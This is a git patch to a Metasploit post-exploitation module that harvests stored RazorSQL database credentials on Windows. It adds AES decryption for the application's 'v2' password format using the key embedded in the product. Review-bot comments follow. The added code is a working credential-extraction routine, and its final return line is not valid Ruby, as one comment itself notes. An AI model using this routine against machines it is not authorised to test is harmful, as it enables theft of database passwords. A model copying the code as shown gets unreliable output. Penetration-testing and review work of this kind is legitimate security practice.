From eb39eaac1d00aec1cada9056a5f543704c8262f6 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Mon, 15 Jun 2015 23:28:10 -0500
Subject: [PATCH] Add support to decryption v2

---
 .../windows/gather/credentials/razorsql.rb | 23 +++++++++++++++++--
 1 file changed, 21 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/credentials/razorsql.rb b/modules/post/windows/gather/credentials/razorsql.rb
index 4e7231c840..a01bb9b7b8 100644
--- a/modules/post/windows/gather/credentials/razorsql.rb
+++ b/modules/post/windows/gather/credentials/razorsql.rb
@@ -6,6 +6,7 @@
 require 'msf/core'
 require 'rex'
 require 'msf/core/auxiliary/report'
+require 'openssl'
 
 class Metasploit3 < Msf::Post
 
@@ -138,7 +139,13 @@ class Metasploit3 < Msf::Post
       pass = (db.scan(/password=(.*)/).flatten[0] ||'').strip
 
       # Decrypt if there's a password
-      decrypted_pass = decrypt(pass) unless pass.blank?
+      unless pass.blank?
+        if pass =~ /\{\{\{VFW(.*)!\^\*#\$RIG/
+          decrypted_pass = decrypt_v2($1)
+        else
+          decrypted_pass = decrypt(pass)
+        end
+      end
 
       pass = decrypted_pass ? decrypted_pass : pass
 
@@ -191,8 +198,20 @@ class Metasploit3 < Msf::Post
       password << char
     end
 
-    return password
+    password
   end
+
+  def decrypt_v2(encrypted)
+    enc = Rex::Text.decode_base64(encrypted)
+    key = Rex::Text.decode_base64('LAEGCx0gKU0BAQICCQklKQ==')
+
+    aes = OpenSSL::Cipher.new('AES-128-CBC')
+    aes.decrypt
+    aes.key = key
+
+    aes.update(enc) aes.final
+  end
+
 end
 
=begin
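Review bot: Passing `$1` to `decrypt_v2` right after the `=~` is fragile style — any regex match that creeps in between would silently change what the decryptor receives, and the bare `$1` gives no hint of what the capture holds. A named capture is clearer and self-documenting: `if (m = pass.match(/\{\{\{VFW(?<blob>.*)!\^\*#\$RIG/))` followed by `decrypted_pass = decrypt_v2(m[:blob])`. The greedy `.*` also accepts an empty blob between the two markers, which is worth a one-line comment since it determines what `decrypt_v2` has to accept. The enclosing method starts and ends outside this hunk.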
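Review bot: `decrypt_v2` has no error path, so a stored value that is not well-formed ciphertext aborts the whole gather run instead of falling back to the raw string: `aes.final` raises `OpenSSL::Cipher::CipherError` on a padding mismatch (wrong key or corrupted data), and `aes.update` raises `ArgumentError` when the base64-decoded blob is empty, which the caller's `(.*)` capture permits. The caller already treats a nil result as "keep the raw value" (`pass = decrypted_pass ? decrypted_pass : pass`), so a method-level rescue returning nil fits: `rescue OpenSSL::Cipher::CipherError, ArgumentError => e`, `vprint_error("RazorSQL v2 decryption failed: #{e.message}")`, `nil`. No IV is set on the cipher, so OpenSSL's default (effectively all-zero) IV is used — if that is what RazorSQL's scheme does, state it in a comment, and hoist the static key into a frozen constant with a note that it is the application's embedded key rather than a per-user secret. As shown here the return line reads `aes.update(enc) aes.final`, which is not valid Ruby; presumably the concatenation `aes.update(enc) + aes.final` was lost in rendering.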